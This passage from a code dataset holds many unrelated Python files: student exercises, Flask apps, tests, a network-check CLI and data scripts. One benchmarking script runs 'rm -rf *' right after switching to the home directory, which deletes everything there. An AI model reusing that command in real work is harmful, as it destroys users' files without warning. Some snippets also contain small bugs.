consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n# Set up library to grab stuff from twitter with your authentication, and \n# return it in a JSON-formatted way\n\napi = tweepy.API(auth, parser=tweepy.parsers.JSONParser()) \nCACHE_FNAME = 'HW7_cache.json'\n\n## Write the rest of your code here!\n\n#### Recommended order of tasks: ####\n## 1. Set up the caching pattern start -- the dictionary and the try/except \n## \t\tstatement shown in class.\n\ntry:\n cache_file = open(CACHE_FNAME, 'r') # Try to read the data from the file\n cache_contents = cache_file.read() # If it's there, get it into a string\n CACHE_DICTION = json.loads(cache_contents) # And then load it into a dictionary\n cache_file.close() # Close the file, we're good, we got the data in a dictionary.\nexcept:\n CACHE_DICTION = {}\n\n## 2. Write a function to get twitter data that works with the caching pattern, \n## \t\tso it either gets new data or caches data, depending upon what the input \n##\t\tto search for is. \n\n#use online json viewer\ndef get_twitter_data():\n\tsearch_term = input(\"Enter Tweet term: \")\n\tword = \"twitter_{}\".format(search_term)\n\n\n\tif word in CACHE_DICTION:\n\t\tprint (\"using cache\")\n\t\ttweets = CACHE_DICTION[word]\n\telse: \n\t\tprint (\"fetching\")\n\t\t#api search of the word in the last 5 tweets\n\t\tresults = api.search(q = search_term, count = 5)\n\t\ttweets = results[\"statuses\"]\n\t\tCACHE_DICTION[word] = tweets\n\t\tf = open(CACHE_FNAME, \"w\")\n\t\t#updates the json file with whatever is in CACHE_DICTION\n\t\tf.write(json.dumps(CACHE_DICTION))\n\t\tf.close\n\n\ttweet_results = list()\n\t#creates the list that has the tweet information\n\tfor tweet in tweets:\n\t\ttweet_results.append(\"TEXT: \" + tweet[\"text\"])\n\t\ttweet_results.append(\"CREATED AT: \" + tweet[\"created_at\"] + \"\\n\")\n\n\treturn tweet_results\n\n\t\n\n\n## 3. Using a loop, invoke your function, save the return value in a variable, and explore the \n##\t\tdata you got back!\n\n#loops three times to search for 3 different words\nfor x in range(3):\n\tdata = get_twitter_data()\n\tfor item in data:\n\t\tprint (item)\n\n\n\n\n\n\n\n\n\n","sub_path":"HW7/206_HW_Twitter.py","file_name":"206_HW_Twitter.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"304732089","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n# from keras.applications.xception import Xception\nfrom sklearn.model_selection import train_test_split\n\n\n# print(os.path.isfile('../nvidia_model.py'))\ntraining_file = '../SDC_jungle.npy'\ntraining_data = np.load(training_file, allow_pickle=True)\nfeature = []\nlabel = []\n\n# print(len(training_data), len(training_data[0]))\n\nfor item in training_data:\n feature.append([item[0], item[1], item[2]])\n label.append(item[3])\n\nfeature = np.asarray(feature)\nlabel = np.asarray(label)\n\nx_train, x_valid, y_train, y_valid = train_test_split(feature, label, test_size=0.2, random_state=0)\n\ncenter = x_train[0][0]\nleft = x_train[0][1]\nright = x_train[0][2]\nprint(y_train[0])\n\nplt.imshow(center)\nplt.imshow(left)\nplt.imshow(right)\nplt.show()\n\n","sub_path":"unused/testpy/test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"410638273","text":"import argparse\r\nimport logging\r\nimport multiprocessing\r\nimport os\r\n\r\nfrom executors import PingExecutor, ntpExecutor\r\n\r\n# For File Logging\r\n\r\nlog_filename = \"logs/app.log\"\r\nlog_format = \"%(asctime)s %(levelname)-8s %(name)-20s %(message)s\"\r\nos.makedirs(os.path.dirname(log_filename), exist_ok=True)\r\nlogger = logging.getLogger()\r\n\r\n# For File Logging\r\n\r\nhandler = logging.FileHandler(log_filename, \"a\")\r\nformatter = logging.Formatter(log_format)\r\nformatter.datefmt = \"%Y-%m-%d %H:%M:%S\"\r\nhandler.setFormatter(formatter)\r\nlogger.addHandler(handler)\r\nlogger.setLevel(logging.DEBUG)\r\n\r\n# For Console Logging - uncomment below to see the changes in the console\r\n\r\n# consoleHandler = logging.StreamHandler()\r\n# consoleHandler.setFormatter(formatter)\r\n# logger.addHandler(consoleHandler)\r\n\r\nargParser = argparse.ArgumentParser()\r\n\r\n\r\ndef define_arguments():\r\n argParser.add_argument('-p', '--ping', nargs=\"+\", help=\"Ping IP Addresses.\")\r\n argParser.add_argument('-r', '--reach', nargs=\"+\", help=\"Reach IP Addresses.\")\r\n argParser.add_argument('-t', '--telnet', nargs=\"+\", help=\"Telnet command\")\r\n argParser.add_argument('-n', '--ntp', nargs=\"+\", help=\"NTP command\")\r\n\r\n\r\ndef run_command():\r\n define_arguments()\r\n parsedargs = argParser.parse_args()\r\n\r\n if parsedargs.ping:\r\n logger.debug(\"It is ping validation\")\r\n str = PingExecutor.executeByMultiThreading(parsedargs)\r\n logger.debug(\"Response in json format:%s\", str)\r\n print(str)\r\n elif parsedargs.reach:\r\n logger.debug(\"It is IP reachability check\")\r\n str = PingExecutor.executeByMultiprocessing(parsedargs)\r\n logger.debug(\"Response in json format:%s\", str)\r\n print(str)\r\n elif parsedargs.ntp:\r\n logger.debug(\"It is IP NTP check\")\r\n str = ntpExecutor.executeByMultiThreading(parsedargs)\r\n logger.debug(\"Response in json format:%s\", str)\r\n print(str)\r\n elif parsedargs.telnet:\r\n logger.debug(\"It is Telnet\")\r\n commandName = \"telnet\"\r\n\r\n\r\nif __name__ == '__main__':\r\n multiprocessing.freeze_support()\r\n run_command()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"47452003","text":"import math\r\n\r\n\r\ndef get_leap_years(start: int, end: int):\r\n list = []\r\n for i in range(start, end + 1):\r\n if i % 4 == 0 and i % 100 != 0:\r\n list.append(i)\r\n elif i % 400 == 0:\r\n list.append(i)\r\n return list\r\n\r\n\r\ndef test_get_leap_years():\r\n assert get_leap_years(2000, 2022) == [2000, 2004, 2008, 2012, 2016, 2020]\r\n assert get_leap_years(1990, 2000) == [1992, 1996, 2000]\r\n assert get_leap_years(1980, 1990) == [1980, 1984, 1988]\r\n\r\n\r\ndef get_perfect_squares(start: int, end: int):\r\n list = []\r\n for i in range(start, end + 1):\r\n if int(math.sqrt(i)) == float(math.sqrt(i)):\r\n list.append(i)\r\n return list\r\n\r\n\r\ndef test_get_perfect_squares():\r\n assert get_perfect_squares(10, 50) == [16, 25, 36, 49]\r\n assert get_perfect_squares(60, 80) == [64]\r\n assert get_perfect_squares(80, 100) == [81, 100]\r\n\r\n\r\ndef is_palindrome(n):\r\n inv = 0 # inversul lui n\r\n x = n # copie a lui n\r\n while n:\r\n inv = inv * 10 + n % 10\r\n n //= 10\r\n return inv == x # returneaza 1 daca n e palindrom sau 0 in caz contrar\r\n\r\n\r\ndef test_is_palindrome():\r\n assert is_palindrome(121) == True\r\n assert is_palindrome(12) == False\r\n assert is_palindrome(11) == True\r\n\r\n\r\ntest_get_leap_years()\r\ntest_get_perfect_squares()\r\ntest_is_palindrome()\r\n\r\n\r\ndef main():\r\n shouldRun = True\r\n while shouldRun == True:\r\n problema = input(\"Da numarul problemei: \")\r\n if problema == \"1\":\r\n print(\"Rezolvi problema 1: afiseaza toti anii bisecti intre doi ani dati(inclusiv anii dati) \")\r\n x = int(input(\"Alege inceputul intervalului: \"))\r\n y = int(input(\"Alege utimul element al intervalului: \"))\r\n listaAni = get_leap_years(x, y)\r\n print(\"Anii bisecti din intervalul dat sunt: \" + \", \".join(str(an) for an in listaAni))\r\n elif problema == \"2\":\r\n print(\"Rezolvi problema 2: afiseaza toate patratele perfecte dintr-un interval inchis dat\")\r\n x = int(input(\"Alege inceputul intervalului: \"))\r\n y = int(input(\"Alege utimul element al intervalului: \"))\r\n listaPatratePerfecte = get_perfect_squares(x, y)\r\n print(\"Patratele perfecte din intervalul dat sunt: \" + \",\".join(str(an) for an in listaPatratePerfecte))\r\n elif problema == \"3\":\r\n print(\"Rezolvi problema 3: Determina daca un numar dat este palindrom\")\r\n x = int(input(\"Citeste n: \"))\r\n rezultat = is_palindrome(x)\r\n if rezultat == True:\r\n print(\"Numarul ales este palindrom\")\r\n else:\r\n print(\"Numarul ales nu este palindrom\")\r\n elif problema == \"x\":\r\n print(\"Ai inchis programul\")\r\n shouldRun = False\r\n else:\r\n print(\"Ai ales un numar gresit, te rog alege din nou! \")\r\n\r\n pass\r\n\r\n\r\nif __name__ == \"_main_\":\r\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"323506246","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nfrom ttastromech import TTAstromech\nimport sys\nimport argparse\n\n\ndef handleArgs():\n\tparser = argparse.ArgumentParser(description='Text to Astromech, creates astromech (R2-D2) sounds from text')\n\t# parser.add_argument('-v', '--version', help='print version number', version=__version__)\n\t# parser.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin)\n\tparser.add_argument('phrase', help='phrase to speak', type=str)\n\t# parser.add_argument('--stdin', help='allows you to pipe string into ttastromech')\n\tparser.add_argument('-s', '--size', help='how much of the input text phrase should be turned into astromech. The input phase will be trimmed to: phrase[:size]', type=int, default=10)\n\t# parser.add_argument('-p', '--path', help='path to write ar markers to, default is current directory', default='.')\n\n\targs = vars(parser.parse_args())\n\treturn args\n\n\nif __name__ == '__main__':\n\t# create an r2\n\tr2 = TTAstromech()\n\n\targs = handleArgs()\n\t# print(args)\n\n\t# allow a sting to be pipped in:\n\t# echo \"hi how are you\" | astromech-speak.py\n\t# if args['stdin']:\n\t# \t# print(sys.stdin)\n\t# \tfor i in sys.stdin:\n\t# \t\tr2.speak(i)\n\t# \t\texit(0)\n\n\tsize = args['size']\n\tphrase = args['phrase']\n\tphrase = phrase[:size]\n\tprint('Saying:', phrase)\n\n\tr2.speak(phrase)\n","sub_path":"bin/astromech-speak.py","file_name":"astromech-speak.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"373338051","text":"#!/usr/local/bin/python\n\nimport lib.config as config\nfrom lib.dispatch import Dispatcher\nfrom lib.handlers import handler_registry, script_dir\nfrom sys import argv\nimport os.path\n\ndefault = config.loads(\"\"\"{\n \"default\" : {\n \"job_type\": \"\"\n },\n \"jobs\": {\n\n }\n}\"\"\")\n\nconfig = config.Config(os.path.join(script_dir(), 'ot.json'), default)\n\ndispatch = Dispatcher(config = config)\nfor i in handler_registry:\n dispatch.register(*i) \n\nif len(argv) == 1:\n dispatch(**config[\"default\"])\nelse:\n for k in argv[1:]:\n dispatch(**config[\"jobs\"][k])\n\nconfig.save()","sub_path":"octotemp.py","file_name":"octotemp.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"70858941","text":"from flask import Flask \nfrom flask import render_template, redirect, request, make_response, session, url_for, flash, g\nfrom utils import *\nfrom config import *\n\napp = Flask(__name__)\napp.debug = True\n# set the secret key. keep this really secret:\napp.secret_key = appConfig['secret_key']\n\n# register the modules \n# user module allows login and other user functions\nfrom users.views import mod as usersModule\napp.register_blueprint(usersModule)\n\n# tzone module - timezone stuff\nfrom tzone.views import mod as tzoneModule\napp.register_blueprint(tzoneModule)\n\n# init and teardown stuff \n@app.before_request\ndef before_request():\n g.appConfig = appConfig\n g.db = getConnection()\n\n@app.teardown_request\ndef teardown_request(exception):\n dropConnection()\n\n# home page \n@app.route('/')\n@templated(\"index.html\")\ndef index():\n return {\"title\": \"Welcome to Timezone Walrus\"}\n\n# create the server if running from the command line \nif __name__ == '__main__':\n app.run(host='0.0.0.0',debug=True)\n\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"38921282","text":"import subprocess\nimport os\nimport sys\nimport time \nimport statistics as stat\n\nPROJECT = sys.argv[1]\nREPETITIONS = int(sys.argv[2])\nTIMEOUT = int(sys.argv[3])\nARRAY_ID = int(sys.argv[4])\n\nHOME = \"/home/stefan\"\nCHOME = \"/media/raid/stefan\"\n\n# gehe zu tmp\nos.chdir(HOME)\n\n# mach ma sauber\nos.system(\"rm -rf *\")\n\nif not \"case_studies\" in os.listdir(\".\"):\n\tos.system(\"git clone https://github.com/smba/cpi_experiments.git case_studies\")\n\n# Obtain binaries\nos.chdir(HOME + \"/case_studies\")\nos.system(\"git pull\")\n\n# get access to binaries\nos.chdir(\"{}\".format(PROJECT))\n\npwd = os.getcwd()\nBINARIES = os.listdir(\".\")\nBINARIES_ABSOLUTE = [pwd + \"/\" + binary for binary in BINARIES]\nos.chdir(\"..\")\n\n# obtain configs\nconfigs = open(\"{}_configs.txt\".format(PROJECT), \"r\").readlines()\nconfig = configs[ARRAY_ID].replace(\"\\n\", \"\")\nconfig_tail = config.split(\" \")\n\nfname = \"perf_{}_{}.csv\".format(PROJECT, ARRAY_ID)\nos.system(\"rm -rf {}\".format(fname))\n\nfor j, binary in enumerate(BINARIES):\n\trev_index = int(binary.split(\"_\")[0]) # revision id\n\tdurations = []\n\tfor i in range(REPETITIONS): \n\t\ttime.sleep(2)\n\t\tstart = time.time()\n\t\ttry:\n\t\t\tsubprocess.run([\n\t\t\t\t\"timeout\", \n\t\t\t\t\"%d\" % TIMEOUT, \n\t\t\t\t\"{}\".format(BINARIES_ABSOLUTE[j])] + config_tail, check=True)\n\t\texcept:\n\t\t\ttime.sleep(2)\n\t\t\tpass\n\n\t\tend=time.time()\n\t\tduration = end - start\n\t\tdurations.append(duration)\n\n\tmedian = stat.median(durations)\n\n\tf = open(fname, \"a+\")\n\tf.write(\"{},{}\\n\".format(rev_index, median))\n\tf.close()\n\nos.system(\"cp {} {}/case_studies/results/{}/{}\".format(fname, CHOME, PROJECT, fname))\n\n","sub_path":"local-slurm.py","file_name":"local-slurm.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"569229425","text":"from flask import Blueprint, render_template\n\nimport utilities.utilities as utilities\n\nhome_blueprint = Blueprint(\n 'home_bp', __name__)\n\n\n@home_blueprint.route('/', methods=['GET'])\ndef home():\n return render_template(\n \"home/home.html\",\n genre_urls=utilities.get_genre_urls(),\n director_url=utilities.get_director_urls(),\n actor_urls=utilities.get_actor_urls()\n )\n # alphabet_urls=utilities.get_movies_by_title(),\n # director_url=utilities.get_movie_by_director(),\n # actor_url=utilities.get_movie_by_actor(),\n\n# we want the home page to show a title screen - welcoem to movies blah blaj have a collapsable nav bar nav bar - has\n# home button, buttons for all genres, and couple of buttons ith alphbets on them, director button, actor button,\n# realsie date, runtime minutes\n\n# home blueprint should have the following in render templete\n# 1. utilities.get_movie_by_title - alphabet - kinda like get articles by date from COVID web app\n# 2. utilities.get_movie by genre\n# 3. utilities.get_movie_by director - director button takes to first movie with all movies with director starting with A\n# 4.\n","sub_path":"home/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"220837828","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nKeräys-käsittelijä\n------------------\n\n\"\"\"\nfrom tornado.httpclient import HTTPRequest, AsyncHTTPClient, HTTPClient\n\nimport tornado.testing\nimport tornado\nimport tornado.web\nimport couch\nfrom WhipAroundRegistry import WarApp\nfrom TestBase import TestAsyncHTTPBase\n\n\nclass KeraysKasittelijaTest(TestAsyncHTTPBase):\n\n def setUp(self):\n self.fetchurl_fi = '/fi/kerays' # muuta minut\n self.fetchurl_sv = '/sv/insamling' # muuta minut\n self.baseurl_fi = '/fi' # älä muuta\n self.baseurl_sv = '/sv' # älä muuta\n self.tietokanta = couch.BlockingCouch(\"rahankeraysrekisteri\")\n super(KeraysKasittelijaTest, self).setUp()\n #tornado.testing.AsyncHTTPTestCase.setUp(self)\n\n def test_kerays_get_fi(self):\n \"\"\"\n KeraysKasittelija, HTTP GET /fi/kerays, elementit\n \"\"\"\n kaanna = self.fi\n # /fi/kerays\n self.http_client.fetch(self.get_url(self.fetchurl_fi), self.stop)\n response = self.wait()\n h1_title = '

' + kaanna('kerays_aloita_kerays_otsikko') + '

'\n self.assertIn(h1_title.encode(encoding='utf-8'), response.body)\n # /fi/kerays/\n self.http_client.fetch(self.get_url(self.fetchurl_fi + '/'), self.stop)\n response = self.wait()\n h1_title = '

' + kaanna('kerays_aloita_kerays_otsikko') + '

'\n self.assertIn(h1_title.encode(encoding='utf-8'), response.body)\n\n def test_kerays_get_sv(self):\n \"\"\"\n KeraysKasittelija, HTTP GET /sv/insamling, elementit\n \"\"\"\n kaanna = self.sv\n # /fi/kerays\n self.http_client.fetch(self.get_url(self.fetchurl_sv), self.stop)\n response = self.wait()\n h1_title = '

' + kaanna('kerays_aloita_kerays_otsikko') + '

'\n self.assertIn(h1_title.encode(encoding='utf-8'), response.body)\n # /fi/kerays/\n self.http_client.fetch(self.get_url(self.fetchurl_sv + '/'), self.stop)\n response = self.wait()\n h1_title = '

' + kaanna('kerays_aloita_kerays_otsikko') + '

'\n self.assertIn(h1_title.encode(encoding='utf-8'), response.body)\n\n def test_kerays_get_id_fi(self):\n \"\"\"\n KeraysKasittelija, HTTP GET /fi/kerays/(1000 && 1001), elementit tietokannasta\n \"\"\"\n\n # /fi/kerays/1000\n tulos = self.tietokanta.view(\"keraykset\", \"kerayksen_numerolla\", key=1000, limit=1)\n self.assertGreater(len(tulos['rows']), 0, u\"Ei keräyksiä tietokannassa. Alusta testitietokanta.\")\n kerays = tulos['rows'][0]['value']\n self.http_client.fetch(self.get_url(self.fetchurl_fi + '/1000'), self.stop)\n response = self.wait()\n nimi_ascii = kerays[\"nimi\"].decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n body_ascii = response.body.decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n self.assertIn(nimi_ascii, body_ascii)\n\n # /fi/kerays/1001/\n tulos = self.tietokanta.view(\"keraykset\", \"kerayksen_numerolla\", key=1001, limit=1)\n self.assertGreater(len(tulos['rows']), 0, u\"Ei keräyksiä tietokannassa. Alusta testitietokanta.\")\n kerays = tulos['rows'][0]['value']\n self.http_client.fetch(self.get_url(self.fetchurl_fi + '/1001/'), self.stop)\n response = self.wait()\n nimi_ascii = kerays[\"nimi\"].decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n body_ascii = response.body.decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n self.assertIn(nimi_ascii, body_ascii)\n\n def test_kerays_get_id_muokkaa_fi(self):\n \"\"\"\n KeraysKasittelija, HTTP GET /fi/kerays/1000/muokkaa ANTAA 404\n\n Tämä testi noutaa tietyn keräyksen muokkaussivun (/kerays//muokkaa\n ja /kerays//muokkaa/)\n ja tarkastaa, että sivulla esiintyy tietty teksti, mikä testataan\n assertInillä.\n \"\"\"\n # /fi/kerays/1000/muokkaa\n tulos = self.tietokanta.view(\"keraykset\", \"kerayksen_numerolla\", key=1000, limit=1)\n self.assertGreater(len(tulos['rows']), 0, u\"Ei keräyksiä tietokannassa. Alusta testitietokanta.\")\n kerays = tulos['rows'][0]['value']\n self.http_client.fetch(self.get_url(self.fetchurl_fi + '/1000/muokkaa'), self.stop)\n response = self.wait()\n self.assertEqual(401, response.code)\n nimi_ascii = kerays[\"nimi\"].decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n body_ascii = response.body.decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n self.assertNotIn(nimi_ascii, body_ascii)\n self.assertNotIn(\"Muokataan\", body_ascii)\n # /fi/kerays/1001/muokkaa/\n tulos = self.tietokanta.view(\"keraykset\", \"kerayksen_numerolla\", key=1001, limit=1)\n self.assertGreater(len(tulos['rows']), 0, u\"Ei keräyksiä tietokannassa. Alusta testitietokanta.\")\n kerays = tulos['rows'][0]['value']\n self.http_client.fetch(self.get_url('/fi/kerays/1001/muokkaa/'), self.stop)\n response = self.wait()\n nimi_ascii = kerays[\"nimi\"].decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n body_ascii = response.body.decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n self.assertNotIn(nimi_ascii, body_ascii)\n self.assertNotIn(\"Muokataan\", body_ascii)\n\n def test_kerays_get_ei_tunnistusta_fi(self):\n \"\"\"\n KeraysKasittelija, HTTP GET /fi/kerays/uusi ilman tunnistusta ei sallittu\n\n Tämä testi yrittää mennä uusi keräys -sivulle (/kerays/uusi) ilman\n kirjautumista ja tarkastaa, että palautus on 401 Unauthorized\n \"\"\"\n self.http_client.fetch(self.get_url('/fi/kerays/uusi'),\n self.stop)\n response = self.wait()\n self.assertIn(\"401: Unauthorized\", response.body)\n\n def test_kerays_get_tunnistuksella_fi(self):\n \"\"\"\n KeraysKasittelija, HTTP GET /fi/kerays/uusi tunnistuksella sallittu\n\n Tämä testi yrittää mennä uusi keräys -sivulle (/kerays/uusi)\n tunnistuksen jälkeen ja tarkastaa, että palautus EI OLE 401 Unauthorized\n \"\"\"\n self.kirjaudu_sisaan()\n self.http_client.fetch(self.get_url('/fi/kerays/uusi'),\n self.stop, headers=self.otsaketiedot)\n response = self.wait()\n self.assertNotIn(\"401: Unauthorized\", response.body)\n\n # TODO: def test_kerays_id_ilmoita_get(self)\n # TODO: def test_kerays_uusi_kirjautunut_get(self)","sub_path":"tests/TestKeraysKasittelija.py","file_name":"TestKeraysKasittelija.py","file_ext":"py","file_size_in_byte":6360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"337879946","text":"class Solution(object):\n class Graph(object):\n def __init__(self, V):\n self.V = V\n self.graph = [[0 for column in range(V)] for row in range(V)]\n\n def isBipartite(self, src):\n colorArr = [-1] * self.V\n colorArr[src] = 1\n queue = []\n queue.append(src)\n while queue:\n u = queue.pop()\n if self.graph[u][u] == 1:\n return False\n for v in range(self.V):\n if self.graph[u][v] == 1 and colorArr[v] == -1:\n colorArr[v] = 1 - colorArr[u]\n queue.append(v)\n elif self.graph[u][v] == 1 and colorArr[v] == colorArr[u]:\n return False\n return True\n\n def isBipartite(self, graph):\n \"\"\"\n :type graph: List[List[int]]\n :rtype: bool\n \"\"\"\n g = self.Graph(len(graph))\n g.graph = graph\n return \"Yes\" if g.isBipartite(0) else \"No\"\n\nsol = Solution()\nprint(sol.isBipartite([[1,3], [0,2], [1,3], [0,2]]))","sub_path":"LeetCodeContests/others/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"158408093","text":"from flask import Flask, json, request\nfrom ops import SaveCachePage\n\napp = Flask(__name__)\n\n\n@app.route('/api/save_cache_page', methods=['POST', 'GET'])\ndef save_cache_page():\n request_body = json.loads(request.data)\n # request_body = request.get_json()\n filename = request_body['filename'] + \".html\"\n filecontent = request_body['filecontent']\n try:\n if filecontent is not None:\n handler = SaveCachePage(filename, filecontent)\n handler.save_file()\n return handler.file_web_path\n return \"\"\n except Exception as ex:\n print(ex)\n return \"error\"\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"eCube_Hotel_2/Services/cache_page/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"37916967","text":"# A module used to create a heatmap of the users belonging to various regions of the world using latitude and longitude\r\nimport folium\r\nfrom folium.plugins import HeatMap\r\n\r\nclass heatmap:\r\n def heatmap(df):\r\n m = folium.Map([26.560000, 75.490000], zoom_start=1) # The coordinates that are used to map the various users within certain latitudes and longitudes\r\n heat = df[['Latitude', 'Longitude']].as_matrix()\r\n HeatMap(heat).add_to(m)\r\n m.save('map.html') # Saving the heatmap created as a html file","sub_path":"func/heatMap.py","file_name":"heatMap.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"255820834","text":"import os\nimport numpy as np\nimport sys\nimport cv2\n\nTRAIN_DATA_FILE_NAME = \"train.txt\"\nTEST_DATA_FILE_NAME = \"test.txt\"\n\n\ndef define_output_redirecter():\n orig_stdout = sys.stdout\n f = None\n\n def redirect(file):\n try:\n if f != None:\n f.close()\n except:\n pass\n f = open(file, \"w\")\n sys.stdout = f\n\n def restore():\n sys.stdout = orig_stdout\n if f != None:\n f.close()\n\n return redirect, restore\n\n\ndef for_each_sample(path, fn):\n \"\"\"\n fn(sample, patient, patientDir)\n - sample - sample file name\n - patient - patient id \n - patientDir - path to patient folder\n \"\"\"\n for patient in filter(lambda x: not x.startswith(\".\"), os.listdir(path)):\n patientDir = os.path.join(path, patient)\n for sample in os.listdir(patientDir):\n fn(sample, patient, patientDir)\n\n\ndef isCancerSample(sampleName):\n return int(sampleName.split(\"-\")[1].split(\".\")[0]) == 1\n\n\ndef save_data(train_data_set, test_data_set, path):\n save_to_csv_file(train_data_set, path, TRAIN_DATA_FILE_NAME)\n save_to_csv_file(test_data_set, path, TEST_DATA_FILE_NAME)\n\n\ndef save_to_csv_file(collection, path, file_name):\n if not os.path.exists(path):\n os.makedirs(path)\n full_path = os.path.join(path, file_name)\n print(\"Writing to: {}\".format(full_path))\n with open(full_path, \"w\") as f:\n for line in collection:\n label = 1 if isCancerSample(line) else 0\n f.write(\"{} {}\\n\".format(line, label))\n\n\ndef load_data(path, labels_as_categories=True, channels=1):\n X, Y = get_data_from_csv_file(\n os.path.join(path, TRAIN_DATA_FILE_NAME),\n labels_as_categories=labels_as_categories,\n channels=channels,\n )\n X_test, Y_text = get_data_from_csv_file(\n os.path.join(path, TEST_DATA_FILE_NAME),\n labels_as_categories=labels_as_categories,\n channels=channels,\n )\n return X, Y, X_test, Y_text\n\n\ndef get_data_from_csv_file(\n path, show_error=False, labels_as_categories=True, channels=1\n):\n data = []\n labels = []\n with open(path) as file:\n while True:\n line = file.readline()\n if not line:\n break\n\n sample_path, label = line.split(\" \")\n array = np.load(sample_path)\n if array.shape == (50, 50):\n if channels == 1:\n data.append(array)\n elif channels == 3:\n data.append(cv2.merge((array, array, array)))\n else:\n raise Exception(\"Invalid channels number.\")\n\n if labels_as_categories:\n labels.append([0.0, 1.0] if int(label) else [1.0, 0.0])\n else:\n labels.append(int(label))\n elif show_error:\n print(\"Shape error: {}\".format(sample_path))\n return (\n np.asarray(data, dtype=\"f\").reshape([-1, 50, 50, channels]),\n np.asarray(labels, dtype=\"f\"),\n )\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"552386314","text":"import requests\nimport base64\nfrom global_setting import *\nimport random\nimport time\nfrom openpyxl import Workbook\nimport threading\ndef ramdom_decimal(max,decimal):\n import random\n a = round(random.randint(0,max)+ random.random(),decimal)\n return a\ndef get_date():\n from datetime import datetime\n now = datetime.now()\n date = now.strftime(\"%Y-%m-%d\")\n print(date)\n return date\nheader_test = {\n\"Host\": \"120.76.102.19:8034\",\n\"Content-Type\": \"application/json;charset=UTF-8\",\n\"Content-Length\": \"1940\",\n}\ndef get():\n pass\ndef get_authorizaiton():\n author = base64.b64encode(str.encode(username + \"&\" + password))\n au = author.decode()\n #print(au,type(au))\n return au\ndef post_ots(u,d,authorizaiton = None):\n re = requests.session()\n if authorizaiton is not None:\n header_test[\"Authorization\"] = \"Basic {}\".format(get_authorizaiton())\n #print(header_test)\n redata = re.post(url = u,json = d,headers = header_test).content.decode(\"utf-8\")\n print(\"result:\",redata)\ndef post_basic(u,d,authorizaiton = None):\n re = requests.session()\n if authorizaiton is not None:\n header_test[\"Authorization\"] = \"Basic {}\".format(get_authorizaiton())\n #print(header_test)\n redata = re.post(url = u,json = d,headers = header_test).content.decode(\"utf-8\")\n result = redata[redata.find('\"ResultDesc\":\"')+14:redata.find('\",\"Item\"')]\n print(\"result:\",result)\n if result == \"提交成功\":\n a = redata.find('\"WayBillNumber\":')\n b = redata.find(',\"SenderInfoStatus\"')\n orderid = redata[a+17:b-1]\n print( redata, \"\\n\",orderid)\n return [1,orderid]\n else:\n #result = redata[redata.find('\"Feedback\":\"') + 12:redata.find('\",\"AgentNumber\"')]\n #print(result)\n return [0,result]\n#get_authorizaiton()\ndef order(orderno,total,length,wide,height,weight):\n\n order_list = []\n order_fail = []\n wb = Workbook()\n ws = wb.active\n row = [\"单号\",\"单号类型\",\"袋牌号\",\"到货时间\",\"长(cm)\",\"宽(cm)\",\"高(cm)\",\"重量(kg)\",\"锁定产品\",\"使用客户重量(是/否)\"]\n ws.append(row)\n for i in range(int(total)):\n on = orderno + str(i+1)\n #random.randint(5,30)\n data[0][\"OrderNumber\"] = on\n data[0][\"Weight\"] = int(weight)\n data[0][\"Length\"] = int(length)\n data[0][\"Height\"] = int(height)\n data[0][\"PackageVolume\"] = int(wide)\n data[0][\"TrackingNumber\"] = random.randint(100000000,900000000)\n orderid = post_basic(u = urls[\"orderurl\"],d= data,authorizaiton=1)\n if orderid[0] !=0:\n order_list.append(orderid[1])\n ws.append([orderid[1], \"\", \"袋子号\", \"\",int(length) , int(wide), int(height), int(weight), \"\", \"是\"])\n #time.sleep(int(sleep))\n else:\n order_fail.append(orderid[1])\n #wb.save(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\批量签入签出\"+ get_date() + \".xlsx\")\n return 